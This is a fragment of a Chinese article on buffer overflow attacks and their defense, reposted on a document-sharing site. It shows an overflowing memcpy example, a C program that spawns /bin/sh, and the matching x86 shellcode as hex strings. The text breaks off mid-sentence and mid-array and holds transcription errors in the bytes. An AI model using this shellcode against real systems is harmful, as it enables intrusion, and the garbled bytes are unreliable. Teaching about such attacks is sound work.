第一范文网 - 专业文章范例文档资料分享平台

缓冲区溢出攻击的分析及防范策略(4)

来源:用户分享 时间:2021-04-05 本文由风息雾散 分享 下载这篇文档 手机版
说明:文章内容仅供预览,部分内容可能不全,需要完整文档或者需要复制内容,请下载word后使用。下载word有问题请添加微信号:xxxxxx或QQ:xxxxxx 处理(尽可能给您提供完整文档),感谢您的支持与谅解。

网络 电子商务 编程

低地址

图1 堆栈结构图

例如,调用以下函数时

Void f(char *src)

{ char dest[4];

memcpy(dest, src,12);

}

堆栈及变量的位置如图2所示:

图2 堆栈及位置的变量图 C2级操作系统提供了进程空间的隔离机制,因此,利用缓冲区溢出攻击

{

char *str[2]={‖/bin/sh‖,0};

exec (―/bin/sh‖,str,0);

}

编译后反编译,并加以整理,得到与以上程序等价的机器码:

―\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00‖

―\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80‖

―\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xdl\xff\xff‖

―\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3‖

事例程序如下:

/ test /

char shellcode[]=

{―\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00‖

搜索“diyifanwen.net”或“第一范文网”即可找到本站免费阅读全部范文。收藏本站方便下次阅读,第一范文网,提供最新高等教育缓冲区溢出攻击的分析及防范策略(4)全文阅读和word下载服务。

缓冲区溢出攻击的分析及防范策略(4).doc 将本文的Word文档下载到电脑,方便复制、编辑、收藏和打印
本文链接:https://www.diyifanwen.net/wenku/1178487.html(转载请注明文章来源)
热门推荐
Copyright © 2018-2022 第一范文网 版权所有 免责声明 | 联系我们
声明 :本网站尊重并保护知识产权,根据《信息网络传播权保护条例》,如果我们转载的作品侵犯了您的权利,请在一个月内通知我们,我们会及时删除。
客服QQ:xxxxxx 邮箱:xxxxxx@qq.com
渝ICP备2023013149号
Top